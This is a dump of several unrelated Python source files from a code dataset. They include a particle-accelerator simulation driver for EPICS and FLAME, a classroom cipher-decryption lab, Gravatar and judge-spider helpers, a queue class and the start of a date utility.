va.append_ro(self._findChannel(elem.name, elem.fields.phase, \"readback\"),\n (elem.name, elem.fields.phase_phy), desc=\"Beam Phase\", egu=\"degree\")\n va.append_ro(self._findChannel(elem.name, elem.fields.energy, \"readback\"),\n (elem.name, elem.fields.energy_phy), desc=\"Beam Energy\", egu=\"MeV\")\n va.append_elem(elem)\n\n elif isinstance(elem, PMElement):\n va.append_ro(self._findChannel(elem.name, elem.fields.x, \"readback\"),\n (elem.name, elem.fields.x), desc=\"Horizontal Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.y, \"readback\"),\n (elem.name, elem.fields.y), desc=\"Vertical Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.xy, \"readback\"),\n (elem.name, elem.fields.xy), desc=\"Diagonal Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.xrms, \"readback\"),\n (elem.name, elem.fields.xrms), desc=\"Horizontal Size\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.yrms, \"readback\"),\n (elem.name, elem.fields.yrms), desc=\"Vertical Size\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.xyrms, \"readback\"),\n (elem.name, elem.fields.xyrms), desc=\"Diagonal Size\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.cxy, \"readback\"),\n (elem.name, elem.fields.cxy), desc=\"X-Y Correlation\", egu=\"m\")\n va.append_elem(elem)\n\n elif isinstance(elem, (BLMElement, BLElement, BCMElement)):\n # ignore these diagnostic elements for now\n pass\n\n elif isinstance(elem, (ValveElement, PortElement, StripElement)):\n # ignore these elements with no relevant channels\n pass\n\n elif isinstance(elem, DriftElement):\n # drift elements have no channels\n pass\n\n elif isinstance(elem, (AttenuatorElement, ApertureElement,\n ChopperElement, DumpElement, SlitElement)):\n # no channels for now\n pass\n\n elif isinstance(elem, (EMSElement, VDElement, FCElement)):\n pass\n\n elif isinstance(elem, ElectrodeElement):\n pass\n\n else:\n raise RuntimeError(\"Unsupported element type: {}\".format(type(elem).__name__))\n\n return va\n\n\nclass VirtualAccelerator(object):\n \"\"\"VirtualAccelerator executes and manages the EPICS IOC process and\n FLAME simulation thread.\n \"\"\"\n def __init__(self, latfactory, settings, chanprefix, data_dir, work_dir=None):\n if not isinstance(latfactory, FlameLatticeFactory):\n raise TypeError(\"VirtualAccelerator: Invalid type for FlameLatticeFactory\")\n self._latfactory = latfactory\n\n if not isinstance(settings, dict):\n raise TypeError(\"VirtualAccelerator: Invalid type for accelerator Settings\")\n self._settings = settings\n\n self._chanprefix = chanprefix\n self._data_dir = data_dir\n self._work_dir = work_dir\n\n self._epicsdb = []\n self._csetmap = OrderedDict()\n self._elemmap = OrderedDict()\n self._fieldmap = OrderedDict()\n self._readfieldmap = OrderedDict()\n\n self._noise = 0.001\n\n self._started = False\n self._continue = False\n self._rm_work_dir = False\n\n self._ioc_process = None\n self._ioc_logfile = None\n\n self._subscriptions = None\n self._wait_event = cothread.Event(False)\n\n @property\n def data_dir(self):\n return self._data_dir\n\n @data_dir.setter\n def data_dir(self, data_dir):\n if not isinstance(data_dir, basestring):\n raise TypeError(\"VirtualAccelerator: 'data_dir' property much be type string\")\n self._data_dir = data_dir\n\n @property\n def work_dir(self):\n return self._work_dir\n\n @work_dir.setter\n def work_dir(self, work_dir):\n if (work_dir is not None) and not isinstance(work_dir, basestring):\n raise TypeError(\"VirtualAccelerator: 'work_dir' property much be type string or None\")\n self._work_dir = work_dir\n\n def append_rw(self, cset, rset, read, field, desc=\"Element\", egu=\"\", prec=5, drvh=None, drvl=None, drvabs=None, drvrel=None, drvratio=None):\n \"\"\"Append a set of read/write channels to this virtual accelerator.\n The algorithm to set EPICS DRVH/DRVL is as:\n - if absolute limit (drvabs) is given, use absolute\n - or if relative limit (drvres) is given, use relative\n - or if a ratio (drvratio) is given, use ratio\n - otherwise, no limit.\n\n Parameters\n ----------\n cset : str\n PV name of set point, handle is 'setpoint'.\n rset : str\n PV name of read back for set point, handle is 'readset'.\n read : str\n PV name of read back, handle is 'readback'.\n field : tuple\n Tuple with element name and field.\n desc : str\n Element description.\n egu :\n EPICS record engineering unit.\n prec : int\n EPICS display precision.\n drvabs :\n Absolute driven limit with +-abs(drvabs).\n drvrel :\n Relative driven limit, value +- abs(drvabs).\n drvratio :\n Driven ratio of setting point value * (1 +- ratio).\n \"\"\"\n if self.is_started():\n raise RuntimeError(\"VirtualAccelerator: Cannot append RW channel when started\")\n\n val = self._settings[field[0]][field[1]]\n if drvabs is not None:\n drvh = abs(drvabs)\n drvl = - abs(drvabs)\n elif drvrel is not None:\n drvh = val + abs(drvabs)\n drvl = val - abs(drvabs)\n elif drvratio is not None:\n drvh = val + abs(val*drvratio)\n drvl = val - abs(val*drvratio)\n\n self._epicsdb.append((\"ao\", cset, OrderedDict([\n (\"DESC\", \"{} Set Point\".format(desc)),\n (\"VAL\", val),\n (\"DRVH\", drvh),\n (\"DRVL\", drvl),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n self._epicsdb.append((\"ai\", rset, OrderedDict([\n (\"DESC\", \"{} Set Point Read Back\".format(desc)),\n (\"VAL\", val),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n self._epicsdb.append((\"ai\", read, OrderedDict([\n (\"DESC\", \"{} Read Back\".format(desc)),\n (\"VAL\", val),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n self._csetmap[cset] = (rset, read)\n self._fieldmap[cset] = field\n\n def append_ro(self, read, field, desc=\"Element\", egu=\"\", prec=5):\n \"\"\"Append a read-only channel to this virtual accelerator.\n\n Parameters\n ----------\n read : str\n PV name of read back, handle is\n field : tuple\n Tuple with element name and field.\n desc : str\n Element description.\n egu :\n EPICS record engineering unit.\n prec : int\n EPICS display precision.\n \"\"\"\n if self.is_started():\n raise RuntimeError(\"VirtualAccelerator: Cannot append RO channel when started\")\n\n self._epicsdb.append((\"ai\", read, OrderedDict([\n (\"DESC\", \"{} Read Back\".format(desc)),\n (\"VAL\", \"0.0\"),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n if field[0] not in self._readfieldmap:\n self._readfieldmap[field[0]] = OrderedDict()\n self._readfieldmap[field[0]][field[1]] = read\n\n def append_elem(self, elem):\n \"\"\"Append an accelerator element to this virtual accelerator.\n \"\"\"\n if self.is_started():\n raise RuntimeError(\"VirtualAccelerator: Cannot append element when started\")\n self._elemmap[elem.name] = elem\n\n def is_started(self):\n \"\"\"Check is virtual accelerator has been started.\"\"\"\n return self._started\n\n def start(self, raise_on_wait=False):\n \"\"\"Start the virtual accelerator. Spawn a new cothread to handle execution.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Start\")\n cothread.Spawn(self._co_start, raise_on_wait, raise_on_wait=True).Wait()\n\n def _co_start(self, raise_on_wait):\n _LOGGER.debug(\"VirtualAccelerator: Start (cothread)\")\n if self._started:\n raise RuntimeError(\"VirtualAccelerator: Already started\")\n\n if not os.path.isdir(self.data_dir):\n raise RuntimeError(\"VirtualAccelerator: Data directory not found: {}\".format(self.data_dir))\n\n if self.work_dir is not None and os.path.exists(self.work_dir):\n raise RuntimeError(\"VirtualAccelerator: Working directory already exists: {}\".format(self.work_dir))\n\n self._started = True\n self._continue = True\n self._wait_event.Reset()\n cothread.Spawn(self._co_execute_with_cleanup, raise_on_wait, raise_on_wait=False)\n\n def stop(self):\n \"\"\"Stop the virtual accelerator.\n Spawn a new cothread to stop gracefully.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Stop\")\n cothread.Spawn(self._co_stop, raise_on_wait=True).Wait()\n\n def _co_stop(self):\n _LOGGER.debug(\"VirtualAccelerator: Stop (cothread)\")\n if self._started:\n _LOGGER.debug(\"VirtualAccelerator: Initiate shutdown\")\n self._continue = False\n else:\n raise RuntimeError(\"VirtualAccelerator: Not started\")\n\n def wait(self, timeout=None):\n _LOGGER.debug(\"VirtualAccelerator: Wait\")\n \"\"\"Wait for the virtual accelerator to stop\n \"\"\"\n cothread.Spawn(self._co_wait, timeout, raise_on_wait=True).Wait()\n\n def _co_wait(self, timeout):\n _LOGGER.debug(\"VirtualAccelerator: Wait (cothread)\")\n if self._started:\n self._wait_event.Wait(timeout)\n else:\n raise RuntimeError(\"VirtualAccelerator: Not started\")\n\n def _co_execute_with_cleanup(self, raise_on_wait):\n \"\"\"Executer method wraps the call to _execute and ensure that\n the proper clean up of connections and processes.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Execute (cothread)\")\n execute_error = None\n try:\n cothread.Spawn(self._co_execute, raise_on_wait=raise_on_wait).Wait()\n except Exception as e:\n execute_error = e\n finally:\n _LOGGER.info(\"VirtualAccelerator: Cleanup\")\n if self._subscriptions is not None:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: close connections\")\n for sub in self._subscriptions:\n sub.close()\n self._subscriptions = None\n\n if self._ioc_process is not None:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: terminate IOC process\")\n self._ioc_process.terminate()\n self._ioc_process.wait()\n self._ioc_process = None\n\n if self._ioc_logfile is not None:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: close IOC log file\")\n self._ioc_logfile.close()\n self._ioc_logfile = None\n else:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: IOC log file is NONE\")\n\n if self._rm_work_dir:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: remove work directory\")\n shutil.rmtree(self.work_dir)\n else:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: work directory is NONE\")\n\n self._started = False\n self._continue = False\n\n if execute_error is None:\n self._wait_event.Signal()\n else:\n self._wait_event.SignalException(execute_error)\n\n def _co_execute(self):\n \"\"\"Execute the virtual accelerator. This includes the following:\n\n 1. Creating a temporary working directory for execution of FLAME.\n 2. Setup the working directory by symlinking from the data directory.\n 3. Writing the EPICS DB to the working directory (va.db).\n 4. Starting the softIoc and channel initializing monitors.\n 5. Add noise to the settings for all input (CSET) channels.\n 6. Create or update the FLAME machine configuration.\n 7. Propagate the FLAME simulation and read the results.\n 8. Update the READ channels of all devives.\n 9. Update the REST channels of input devies.\n 10. Repeat from step #5.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Execute virtual accelerator\")\n\n if self._chanprefix is None:\n chanprefix = \"\"\n else:\n chanprefix = self._chanprefix\n\n # Add channel for sample counting\n sample_cnt = chanprefix + \"SVR:CNT\"\n\n self._epicsdb.append((\"ai\", sample_cnt, OrderedDict([\n (\"DESC\", \"Sample counter for scan client\"),\n (\"VAL\", 0)\n ])))\n\n # Add channel for VA configuration and control\n channoise = chanprefix+\"SVR:NOISE\"\n\n self._epicsdb.append((\"ao\", channoise, OrderedDict([\n (\"DESC\", \"Noise level of Virtual Accelerator\"),\n (\"VAL\", 0.001),\n (\"PREC\", 5)\n ])))\n\n chanstat = chanprefix+\"SVR:STATUS\"\n\n self._epicsdb.append((\"bi\", chanstat, OrderedDict([\n (\"DESC\", \"Status of Virtual Accelerator\"),\n (\"VAL\", 1),\n (\"ZNAM\", \"ERR\"),\n (\"ONAM\", \"OK\"),\n (\"PINI\", \"1\")\n ])))\n\n chancharge = chanprefix+\"SVR:CHARGE\"\n\n self._epicsdb.append((\"ai\", chancharge, OrderedDict([\n (\"DESC\", \"Q/M of Virtual Accelerator\"),\n (\"VAL\", 0.0),\n (\"PREC\", 5)\n ])))\n\n if self.work_dir is not None:\n os.makedirs(self.work_dir)\n self._rm_work_dir = False\n else:\n self.work_dir = tempfile.mkdtemp(_TEMP_DIRECTORY_SUFFIX)\n self._rm_work_dir = True\n\n _LOGGER.info(\"VirtualAccelerator: Working directory: %s\", self._work_dir)\n\n # input file paths\n epicsdbpath = os.path.join(self.work_dir, \"va.db\")\n latticepath = os.path.join(self.work_dir, \"test.lat\")\n\n #output file paths\n epicslogpath = os.path.join(self.work_dir, \"softioc.log\")\n\n if os.path.isabs(self.data_dir):\n abs_data_dir = self.data_dir\n self._latfactory.dataDir = self.data_dir\n else:\n abs_data_dir = os.path.abspath(self.data_dir)\n self._latfactory.dataDir = os.path.abspath(self.data_dir)\n print(self._latfactory.dataDir)\n\n with open(epicsdbpath, \"w\") as outfile:\n self._write_epicsdb(outfile)\n _LOGGER.info(\"VirtualAccelerator: Write EPICS database to %s\", epicsdbpath)\n #_LOGGER.debug(\"VirtualAccelerator: Write EPICS database to %s\", epicsdbpath)\n\n self._ioc_logfile = open(epicslogpath, \"w\")\n self._ioc_process = Popen([\"softIoc\", \"-d\", \"va.db\"], cwd=self.work_dir,\n stdout=self._ioc_logfile, stderr=subprocess.STDOUT)\n _LOGGER.debug(\"VirtualAccelerator: Start EPICS soft IOC with log %s\", epicslogpath)\n\n _LOGGER.debug(\"VirtualAccelerator: Connecting to channels: {}\".format(len(self._csetmap.keys())))\n\n self._subscriptions = []\n\n self._subscriptions.append(catools.camonitor(channoise, self._handle_noise_monitor))\n\n self._subscriptions.extend(catools.camonitor(self._csetmap.keys(), self._handle_cset_monitor))\n\n _LOGGER.debug(\"VirtualAccelerator: Connecting to channels: Done\")\n\n machine = None\n\n while self._continue:\n # update the RSET channels with new settings\n batch = catools.CABatch()\n for cset in self._csetmap.items():\n name, field = self._fieldmap[cset[0]]\n batch[cset[1][0]] = self._settings[name][field]\n batch.caput()\n\n settings = self._copy_settings_with_noise()\n self._latfactory.settings = settings\n lattice = self._latfactory.build()\n\n with open(latticepath, \"w\") as outfile:\n lattice.write(outfile)\n\n start = time.time()\n\n if machine is None:\n _LOGGER.debug(\"VirtualAccelerator: Create FLAME machine from configuration\")\n machine = Machine(lattice.conf())\n else:\n _LOGGER.debug(\"VirtualAccelerator: Reconfigure FLAME machine from configuration\")\n for idx, elem in enumerate(lattice.elements):\n machine.reconfigure(idx, elem[2])\n\n _LOGGER.debug(\"VirtualAccelerator: Allocate FLAME state from configuration\")\n S = machine.allocState({})\n\n output_map = []\n for elem in lattice.elements:\n if 'name' in elem[3]:\n output_map.append(elem[3]['name'])\n else:\n output_map.append(None)\n\n batch = catools.CABatch()\n for i in range(0, len(machine)):\n machine.propagate(S, i, 1)\n\n if output_map[i] in self._elemmap:\n elem = self._elemmap[output_map[i]]\n if isinstance(elem, BPMElement):\n x_centroid = S.moment0_env[0]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.x_phy], x_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.x_phy]] = x_centroid\n y_centroid = S.moment0_env[2]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.y_phy], y_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.y_phy]] = y_centroid\n # convert rad to deg and adjust for 161MHz sampling frequency\n phase = _normalize_phase(2.0 * S.ref_phis * (180.0 / math.pi))\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.phase_phy], phase)\n batch[self._readfieldmap[elem.name][elem.fields.phase_phy]] = phase\n energy = S.ref_IonEk/1.0e6 # convert eV to MeV\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.energy_phy], energy)\n batch[self._readfieldmap[elem.name][elem.fields.energy_phy]] = energy\n elif isinstance(elem, PMElement):\n x_centroid = S.moment0_env[0]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.x], x_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.x]] = x_centroid\n y_centroid = S.moment0_env[2]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.y], y_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.y]] = y_centroid\n x_rms = S.moment0_rms[0]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.xrms], x_rms)\n batch[self._readfieldmap[elem.name][elem.fields.xrms]] = x_rms\n y_rms = S.moment0_rms[2]/1.0e3\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.yrms], y_rms)\n batch[self._readfieldmap[elem.name][elem.fields.yrms]] = y_rms\n\n sign = elem.sign\n xy_centroid = (sign*x_centroid + y_centroid)/math.sqrt(2.0) # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.xy], xy_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.xy]] = xy_centroid\n\n xy_rms = 1.0e-3*math.sqrt(\n (S.moment1_env[0, 0] + S.moment1_env[2, 2])*0.5\n + sign*S.moment1_env[0, 2]\n )\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.xyrms], xy_rms)\n batch[self._readfieldmap[elem.name][elem.fields.xyrms]] = xy_rms\n\n cxy = sign * S.moment1_env[0, 2] * 1e-6 / x_rms / y_rms\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.cxy], cxy)\n batch[self._readfieldmap[elem.name][elem.fields.cxy]] = cxy\n\n batch.caput()\n\n _LOGGER.info(\"VirtualAccelerator: FLAME execution time: %f s\", time.time()-start)\n\n # Allow the BPM, PM, etc. readbacks to update\n # before the device setting readbacks PVs.\n cothread.Yield()\n\n batch = catools.CABatch()\n for name, value in self._csetmap.items():\n name, field = self._fieldmap[name]\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\", value[1], settings[name][field])\n batch[value[1]] = settings[name][field]\n batch.caput()\n\n # Sleep for a fraction (10%) of the total execution time\n # when one simulation costs more than 0.50 seconds.\n # Otherwise, sleep for the rest of 1 second.\n # If a scan is being done on this virtual accelerator,\n # then the scan server has a period of time to update\n # setpoints before the next run of IMPACT.\n if (time.time()-start) > 0.50:\n cothread.Sleep((time.time()-start)*0.1)\n else:\n cothread.Sleep(1.0 - (time.time()-start))\n\n def _handle_cset_monitor(self, value, idx):\n \"\"\"Handle updates of CSET channels by updating\n the corresponding setting and RSET channel.\n \"\"\"\n cset = list(self._csetmap.items())[idx]\n _LOGGER.debug(\"VirtualAccelerator: Update cset: '%s' to %s\", cset[0], value)\n name, field = self._fieldmap[cset[0]]\n self._settings[name][field] = float(value)\n\n def _handle_noise_monitor(self, value):\n \"\"\"Handle updates of the NOISE channel.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Update noise: %s\", value)\n self._noise = float(value)\n\n def _copy_settings_with_noise(self):\n s = deepcopy(self._settings)\n for name, field in self._fieldmap.values():\n s[name][field] = s[name][field] + s[name][field] * self._noise * 2.0*(random.random()-0.5)\n return s\n\n def _write_epicsdb(self, buf):\n for record in self._epicsdb:\n buf.write(\"record({}, \\\"{}\\\") {{\\r\\n\".format(record[0], record[1]))\n for name, value in record[2].items():\n if value is None:\n pass # ignore fields with value None\n elif isinstance(value, int):\n buf.write(\" field(\\\"{}\\\", {})\\r\\n\".format(name, value))\n elif isinstance(value, float):\n buf.write(\" field(\\\"{}\\\", {})\\r\\n\".format(name, value))\n else:\n buf.write(\" field(\\\"{}\\\", \\\"{}\\\")\\r\\n\".format(name, value))\n buf.write(\"}\\r\\n\\r\\n\")\n\n\ndef _normalize_phase(phase):\n while phase >= 360.0:\n phase -= 360.0\n while phase < 0.0:\n phase += 360.0\n return phase\n","sub_path":"phantasy/facility/frib/virtaccel/flame.py","file_name":"flame.py","file_ext":"py","file_size_in_byte":41699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"463880263","text":"def from_head_to_tail(seq, n=1):\n return seq[n:] + seq[:n]\n\n\ndef get_position(str1, str2):\n for i in range(len(str1)):\n if str1[i] != str2[i]:\n return i\n\n\nalphabet = [chr(i) for i in range(ord('а'), ord('а') + 32)]\n\nmatrix = [from_head_to_tail(alphabet)]\nfor i in range(len(alphabet) - 1):\n matrix.append(from_head_to_tail(matrix[i]))\n\nvariant = {0: ('вапр', 'вакш', 'и'),\n 1: ('юбьшхшцяыщгощмхо', 'юбофхесшъдкхкыйжщ', 'а'),\n 2: ('ььыйдбэоетлыб', 'ььыбшеяъззлнуы', 'а'),\n 3: ('нэфцшкмхыжэыптгг', 'нэсхчщлнцэзюэрудд', 'о'),\n 4: ('ховчаамцыо', 'хпыэюдшайчр', 'о')}\n\nfor k, v in sorted(variant.items(), key=lambda x: x[0]):\n e1, e2, symbol = v\n\n position = get_position(e1, e2)\n key = []\n message = [symbol]\n\n for position in range(position, len(e1)):\n i = alphabet.index(message[-1])\n n = matrix[i].index(e2[position])\n key.append(alphabet[n])\n\n i = alphabet.index(key[-1])\n n = matrix[i].index(e1[position])\n message.append(alphabet[n])\n\n print(f\"Вариант {k}: {''.join(message)}\")\n\nprint('--------------------------------------------')\n\nvariant = {0: ('А', 'Б', 'ЛСКРФРЕСБОНБ'),\n # ПРОВЕРКА СТОЙКОСТИ ШИФРA\n 1: ('Б', 'В', 'СТСДИТМГУХРМНРУХКЫЛЦУВ'),\n # СЕГОДНЯ НЕБОЛЬШОЙ ДОЖДЬ\n 2: ('А', 'Б', 'ТЗДРЕОБОЗГПМЮЩПЛЕПЗЕЮ'),\n # ЗАВТРА ТОЖЕ БУДЕТ ДОЖДЬ\n 3: ('А', 'В', 'ИГЕУУБУСЗИДФЗИХЕСЗЕЯ')}\n\nfor k, v in sorted(variant.items(), key=lambda x: x[0]):\n s1, s2, enc = v\n\n first_half, second_half = [], []\n for e in enc:\n i1 = alphabet.index(s1.lower())\n n1 = matrix[i1].index(e.lower())\n first_half.append(alphabet[n1])\n\n i2 = alphabet.index(s2.lower())\n n2 = matrix[i2].index(e.lower())\n second_half.append(alphabet[n2])\n\n print(f'Вариант: {k}')\n print(''.join(first_half).upper())\n print(''.join(second_half).upper())\n\nprint('--------------------------------------------')\n\nvariant = {1: ('А', 'Г', 'Е', 'вфоддкбфижцчаоимдчум'),\n #\n 2: ('Б', 'В', 'Г', 'вецтффтуспсрзгнвнцлоз'),\n #\n 3: ('А', 'Б', 'В', 'ФТЫЮУФДУСЭШЬЪОГАЪФЕЦРЭЬО'),\n #\n 4: ('А', 'Б', 'В', 'наючроржнннрщыбп')}\n\nfor k, v in sorted(variant.items(), key=lambda x: x[0]):\n s1, s2, s3, enc = v\n\n first, second, third = [], [], []\n for e in enc:\n i1 = alphabet.index(s1.lower())\n n1 = matrix[i1].index(e.lower())\n first.append(alphabet[n1])\n\n i2 = alphabet.index(s2.lower())\n n2 = matrix[i2].index(e.lower())\n second.append(alphabet[n2])\n\n i3 = alphabet.index(s3.lower())\n n3 = matrix[i3].index(e.lower())\n third.append(alphabet[n3])\n\n print(f'Вариант: {k}')\n print(''.join(first).upper())\n print(''.join(second).upper())\n print(''.join(third).upper())\n","sub_path":"lab3_oibis.py","file_name":"lab3_oibis.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"457430220","text":"#!/usr/bin/env python2\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 19 10:57:38 2016\r\nTo check raw file count in tarballs, because ¨ls¨ takes eons\r\n@author: Dinesh\r\n\r\nUsage:\r\ncommand line arguments - {source folder}\r\n\r\n\"\"\"\r\nfrom __future__ import print_function\r\nimport tarfile\r\nimport os, sys\r\n\r\n\r\n\r\ndef find_file_contents(source_dir):\r\n total = 0\r\n archives = [item for item in os.listdir(source_dir)]\r\n \r\n for item in archives:\r\n if \"tar\" in item:\r\n archive = tarfile.open(os.path.join(source_dir, item))\r\n archive_items = archive.getmembers()\r\n total = total + len(archive_items)\r\n print (len(archive_items))\r\n print (\"Total = \"+ str(total))\r\n \r\n \r\n\r\n \r\n\r\nif __name__== \"__main__\":\r\n \r\n root_dir = sys.argv[1]\r\n \r\n print (\"Reading contents of \" +root_dir)\r\n find_file_contents(root_dir)\r\n \r\n","sub_path":"abb_deeplearning_keras/Source_code/image_count.py","file_name":"image_count.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"357295042","text":"import urllib\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.utils.hashcompat import md5_constructor\n\nfrom jingo import register\nfrom jinja2 import Markup\n\nfrom flicks.base.util import absolutify\n\n\nGRAVATAR_URL = getattr(settings, 'GRAVATAR_URL', 'http://www.gravatar.com')\nDEFAULT_GRAVATAR = absolutify(settings.DEFAULT_GRAVATAR)\n\n\n@register.function\ndef gravatar_url(arg, size=80):\n if isinstance(arg, User):\n email = arg.email\n else: # Treat as email\n email = arg\n\n url = '%(url)s/avatar/%(email_hash)s?%(options)s' % {\n 'url': GRAVATAR_URL,\n 'email_hash': md5_constructor(email.lower()).hexdigest(),\n 'options': urllib.urlencode({'s': str(size),\n 'default': DEFAULT_GRAVATAR})\n }\n\n return url\n\n\n@register.function\ndef gravatar_img(arg, size=80, img_class=None):\n return Markup('' % {\n 'class': img_class,\n 'src': gravatar_url(arg, size=size)\n })\n","sub_path":"flicks/users/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"580728666","text":"from VirtualJudgeSpider import config\nfrom VirtualJudgeSpider import control\nfrom celery import shared_task\nfrom django.db import DatabaseError\n\nfrom support.dispatcher import ConfigDispatcher\nfrom support.models import Language\nfrom support.models import Support\n\n\n@shared_task\ndef update_oj_status(oj_name):\n status = control.Controller(oj_name).check_status()\n oj = Support.objects.get(oj_name=oj_name)\n if status:\n oj.oj_status = 'SUCCEED'\n else:\n oj.oj_status = 'FAILED'\n oj.save()\n\n\n@shared_task\ndef update_language_task(remote_oj):\n if ConfigDispatcher.choose_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'TRUE'):\n\n account = ConfigDispatcher.choose_account(remote_oj)\n if account is None:\n ConfigDispatcher.release_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'FALSE')\n return\n remote_account = config.Account(username=account.oj_username, password=account.oj_password,\n cookies=account.cookies)\n controller = control.Controller(remote_oj)\n langs = controller.find_language(account=remote_account)\n print(remote_oj, langs)\n account.cookies = controller.get_cookies()\n account.save()\n ConfigDispatcher.release_account(account.id)\n\n if langs is None:\n ConfigDispatcher.release_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'FALSE')\n return\n Language.objects.filter(oj_name=remote_oj).delete()\n for lang, lang_name in langs.items():\n try:\n language = Language(oj_name=remote_oj, oj_language=lang, oj_language_name=lang_name)\n language.save()\n except DatabaseError:\n pass\n ConfigDispatcher.release_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'FALSE')\n","sub_path":"support/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"223133637","text":"from Node import Node\n\nclass Queue(object):\n 'Generic Queue class'\n\n \"\"\"\n @param t_front: node to become front of queue\n \"\"\"\n def __init__(self, t_front=Node()):\n self.front = t_front\n self.size = 0\n\n \"\"\"\n @param t_node: the node to be enqueued\n \"\"\"\n def enqueue(self, t_node):\n if self.front.value == None:\n self.front = t_node\n else:\n current_node = self.front\n while current_node.next != None:\n current_node = current_node.next\n current_node.next = t_node\n self.size += 1\n\n \"\"\"\n dequeues the node at the front of the queue\n \"\"\"\n def dequeue(self):\n if self.front.value == None:\n print('Queue is already empty, front node not removed.')\n else:\n self.front = self.front.next\n self.size -= 1\n\n \"\"\"\n returns node value at the front of the queue\n \"\"\"\n def peek(self):\n return self.front.value\n\n \"\"\"\n prints value of each node in queue\n \"\"\"\n def printQueue(self):\n current_node = self.front\n while current_node.next != None:\n print(current_node.value)\n current_node = current_node.next\n","sub_path":"Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"350202962","text":"from __future__ import division\nfrom similarity.levenshtein import Levenshtein\nfrom similarity.jaccard import Jaccard\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport numpy as np\nimport datetime\nimport re\nfrom datetime import tzinfo\nfrom dateutil.parser import parse\nimport pytz\nfrom numpy import trapz\nimport re\nfrom scipy.ndimage import gaussian_filter\nfrom numpy import matlib\nfrom copy import deepcopy\nimport nltk\nfrom nltk import ngrams\nimport matplotlib.pyplot as plt\nfrom datautils import *\n\ndef get_date_type(date_str):\n separator = ''\n if '.' in date_str:\n separator = '.'\n elif '\\\\' in date_str:\n separator = '\\\\'\n elif '/' in date_str:\n separator = '/'\n elif '-' in date_str:\n separator = '-'\n else:\n return None\n try:\n date_parts = [ d.strip() for d in date_str.split(separator) ]\n if re.match('\\\\d{4}[-\\\\.\\\\\\\\]\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{1,2}', date_str):\n return datetime.datetime.strptime(date_str, '%Y' + separator + '%m' + separator + '%d').date()\n if re.match('\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{4}', date_str):\n return datetime.datetime.strptime(date_str, '%d' + separator + '%m' + separator + '%Y').date()\n if 